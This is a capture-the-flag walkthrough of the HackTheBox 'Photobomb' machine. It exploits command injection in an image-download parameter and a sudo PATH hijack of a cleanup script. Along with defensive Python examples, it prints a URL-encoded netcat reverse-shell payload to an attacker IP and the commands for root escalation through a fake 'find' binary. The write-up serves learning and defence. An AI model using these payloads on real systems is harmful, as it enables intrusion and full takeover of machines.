Photobomb HackTheBox Walkthrough

Photobomb is an easy-level Linux machine from HackTheBox. It involves exploiting an image download feature to get RCE, and then abusing a bash script that calls programs without absolute paths. Let's get started!


Network Scan

As usual, I started the initial enumeration by running a port scan using nmap looking for open ports and running services.

┌──(madhav㉿kali)-[~/ctf/htb/photobomb]
└─$ nmap -sC -sV -oN nmap/initial 10.10.11.182
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-16 03:40 IST
Nmap scan report for 10.10.11.182
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.42 seconds

We have two ports open: SSH on port 22 and an HTTP web server (nginx) on port 80. The nmap results show that the web server redirects to http://photobomb.htb, so let's add it to our hosts file.

┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
10.10.11.182    photobomb.htb

We are good to go! Now let's start by enumerating port 80.

Web Enumeration and User Shell

On visiting the website in our web browser, we get a static page. It has a link that redirects us to the login page.

Checking the source code of this website, we find a JavaScript file which contains some credentials.

view-source:http://photobomb.htb/photobomb.js

After logging in, we are redirected to the /printer page. It shows some images and lets us download them in different formats and resolutions.

The print functionality works as expected, and we get the selected image in the requested resolution and file type. Let's explore and try exploiting this application. I captured the download request via BurpSuite and found something interesting.

After testing some custom inputs in the parameters, I found out that the filetype parameter used here is vulnerable to command injection.

The application converts the images in the backend using the convert tool from ImageMagick, running something like:

convert [photo] -resize [dimensions] name.[filetype]

We need to append ;<command> to the filetype parameter, so that our command also gets executed when the request is processed.
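To see the bug from the code side, here is an added Python example. It is not the box's own application (whose source is not shown in this post): a builder that splices the request parameters into a shell string the way the walkthrough describes, beside a hardened version that allow-lists every user-controlled value and hands ImageMagick an argv list with no shell in between. The allowed file types and dimensions are assumptions.

```python
import subprocess
from typing import List

# Allow-lists for this example. The real Photobomb application's accepted values
# are not stated in the walkthrough, so these sets are assumptions.
ALLOWED_FILETYPES = {"jpg", "png"}
ALLOWED_DIMENSIONS = {"3000x2000", "1500x1000", "600x400"}


def vulnerable_command(photo: str, dimensions: str, filetype: str) -> str:
    """The pattern the walkthrough describes: request parameters are spliced
    into one shell string. Anything after a ';' in filetype becomes a second
    command once the string is handed to a shell."""
    return f"convert {photo} -resize {dimensions} name.{filetype}"


def hardened_argv(photo: str, dimensions: str, filetype: str) -> List[str]:
    """Hardened form: every user-controlled value must match an allow-list, and
    the command is built as an argv list, so no shell ever parses it."""
    if filetype not in ALLOWED_FILETYPES:
        raise ValueError(f"unsupported filetype: {filetype!r}")
    if dimensions not in ALLOWED_DIMENSIONS:
        raise ValueError(f"unsupported dimensions: {dimensions!r}")
    # The photo name comes from the server's own listing; still refuse path
    # separators and option-like names so it cannot point outside the image
    # directory or be parsed by convert as a flag.
    if "/" in photo or photo.startswith("-") or not photo.endswith(".jpg"):
        raise ValueError(f"bad photo name: {photo!r}")
    return ["convert", photo, "-resize", dimensions, f"name.{filetype}"]


def convert_image(photo: str, dimensions: str, filetype: str) -> None:
    """Run ImageMagick with the validated argv (shell=False is the default)."""
    subprocess.run(hardened_argv(photo, dimensions, filetype), check=True)


if __name__ == "__main__":
    tainted = "png;id"  # constructed sample of a tainted filetype value
    print("shell string built from tainted input:",
          vulnerable_command("a.jpg", "600x400", tainted))
    try:
        hardened_argv("a.jpg", "600x400", tainted)
    except ValueError as err:
        print("hardened builder rejected it:", err)
    print("clean argv:", hardened_argv("a.jpg", "600x400", "png"))
```

The allow-list is the important part: escaping the metacharacters would only fix this one request, while restricting filetype and dimensions to the values the page actually offers removes the whole class of problem, and the argv list means convert receives the values untouched even if a future change reintroduces a shell.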

We do not get any output, but our command gets executed in the background. Similarly, we can follow the same steps to execute a reverse shell payload. I generated the payload from revshells.com.

We also need to URL-encode the payload so that it is passed through correctly. After encoding, the payload looks similar to this:

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.14.87%209001%20%3E%2Ftmp%2Ff

The payload gets executed successfully and we get a reverse shell back to our system.

┌──(madhav㉿kali)-[~/ctf/htb/photobomb]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.87] from (UNKNOWN) [10.10.11.182] 39440
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-5.0$ id
id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
bash-5.0$

Now that we have a user shell, we can read the user flag present in the home directory of the wizard user.

bash-5.0$ cd /home/wizard
cd /home/wizard
bash-5.0$ cat user.txt
cat user.txt
*********************************
bash-5.0$

Root Shell

Getting a root shell on this box was pretty straightforward. First of all, I used sudo -l to check whether we can execute any files as other users.

I found that we can execute /opt/cleanup.sh as root without a password. Also notice that the SETENV tag is set, which lets us pass environment variables such as PATH through sudo.

bash-5.0$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

First of all, let us look at /opt/cleanup.sh. This script cleans up log files. We can see that programs like cd, find and chown are used here without absolute paths (cd is a shell builtin and is not resolved through PATH, but find and chown are).

This means that we can create our own version of these programs and force the script to execute it by modifying PATH.

bash-5.0$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

To exploit this, I created a new folder named exploit, inside which I created a find program that simply executes /bin/bash when called. Then I added the folder to the front of PATH.
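From the defender's side, the question is how to spot this combination (SETENV on a sudo rule plus a script that resolves commands through PATH) before someone else does. The following is an added Python example, not a tool from the box or from the walkthrough: a small checker that tokenises a shell script, reports external commands invoked by bare name, and flags the sudo rule as a PATH hijack risk when the script does not pin PATH itself. It is run over the sudoers line and cleanup.sh exactly as shown above, and over a hardened version of the script that I wrote as a suggested fix (the /usr/bin locations of find and chown are assumed). The builtin and keyword tables are a simplification that covers this script's style, and separators are only recognised when whitespace-delimited.

```python
import shlex
from typing import List

# Words that are handled by the shell itself and never looked up through PATH.
SHELL_BUILTINS = {
    "cd", "echo", "printf", "export", "set", "unset", "source", ".", "test", "[",
    "[[", "exit", "return", "local", "read", "shift", "eval", "exec", "fi",
    "done", "esac", "true", "false", ":", "pwd",
}
# Words after which the *next* word is again a command name (and goes through PATH).
COMMAND_PREFIXES = {
    "if", "then", "else", "elif", "while", "until", "do", "!", "time", "sudo",
    "nohup", "xargs", "-exec", "-execdir",
}
SEPARATORS = {";", "&&", "||", "|", "&"}


def unqualified_commands(script: str) -> List[str]:
    """External programs the script invokes by bare name, i.e. names that PATH
    resolves at run time, in order of first appearance."""
    found: List[str] = []
    for raw in script.splitlines():
        line = raw.split("#", 1)[0].strip()  # drops comments and the shebang
        if not line:
            continue
        try:
            words = shlex.split(line)  # '\;' after -exec becomes a plain ';'
        except ValueError:
            words = line.split()
        expect_command = True
        for word in words:
            if word in SEPARATORS or word in COMMAND_PREFIXES:
                expect_command = True
                continue
            if not expect_command:
                continue  # an argument, redirection or test operand
            if "=" in word:
                continue  # VAR=value prefix; the command name follows
            if word not in SHELL_BUILTINS and not word.startswith("/"):
                if word not in found:
                    found.append(word)
            expect_command = False
    return found


def script_sets_path(script: str) -> bool:
    """True if the script pins PATH itself instead of trusting the caller's."""
    return any(ln.strip().startswith(("PATH=", "export PATH="))
               for ln in script.splitlines())


def path_hijack_risk(sudoers_entry: str, script: str) -> bool:
    """Risk exists when sudo lets the caller pass PATH in (SETENV), the script
    does not reset PATH, and it runs at least one command by bare name."""
    return ("SETENV" in sudoers_entry
            and not script_sets_path(script)
            and bool(unqualified_commands(script)))


# The sudoers line and cleanup.sh as shown in the walkthrough.
SUDOERS_ENTRY = "(root) SETENV: NOPASSWD: /opt/cleanup.sh"
CLEANUP_SH = r"""#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
"""

# Suggested fix (mine, not the box's): pin PATH first and use absolute paths.
# /usr/bin/find and /usr/bin/chown are assumed to be the Ubuntu locations.
HARDENED_SH = r"""#!/bin/bash
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH
. /opt/.bashrc
cd /home/wizard/photobomb
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
/usr/bin/find source_images -type f -name '*.jpg' -exec /usr/bin/chown root:root {} \;
"""

if __name__ == "__main__":
    print("bare commands in cleanup.sh:", unqualified_commands(CLEANUP_SH))
    print("hijack risk (original):", path_hijack_risk(SUDOERS_ENTRY, CLEANUP_SH))
    print("hijack risk (hardened):", path_hijack_risk(SUDOERS_ENTRY, HARDENED_SH))
```

Note that the checker treats cd and the [ tests as builtins, so for this script it reports only find and chown, which matches where the real exposure is. Dropping SETENV from the sudo rule would close the hole on its own, since env_reset and secure_path would then govern PATH; the absolute paths in the hardened script are the belt-and-braces fix that does not depend on sudo configuration (and note that the sourced /opt/.bashrc could still alter PATH after it is pinned, which is why the absolute paths matter more than the PATH line).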

bash-5.0$ mkdir exploit
mkdir exploit
bash-5.0$ cd exploit
cd exploit
bash-5.0$ echo "/bin/bash" > find
echo "/bin/bash" > find
bash-5.0$ chmod +x find
chmod +x find
bash-5.0$

Next, I executed the /opt/cleanup.sh script, setting PATH in the same sudo command, and we got a root shell.

bash-5.0$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)

Hurray! We are root. Now that we have a root shell, we can read the final flag in the root directory!

root@photobomb:/home/wizard/photobomb# cd /root
cd /root
root@photobomb:~# ls
ls
root.txt
root@photobomb:~# cat root.txt
cat root.txt
*********************************
root@photobomb:~#

That's it! Thank you for reading this article. Do let me know in the comments if you have any questions or feedback. Stay tuned for similar articles.

NOTE: The awesome artwork used in this article was created by Rick Hines.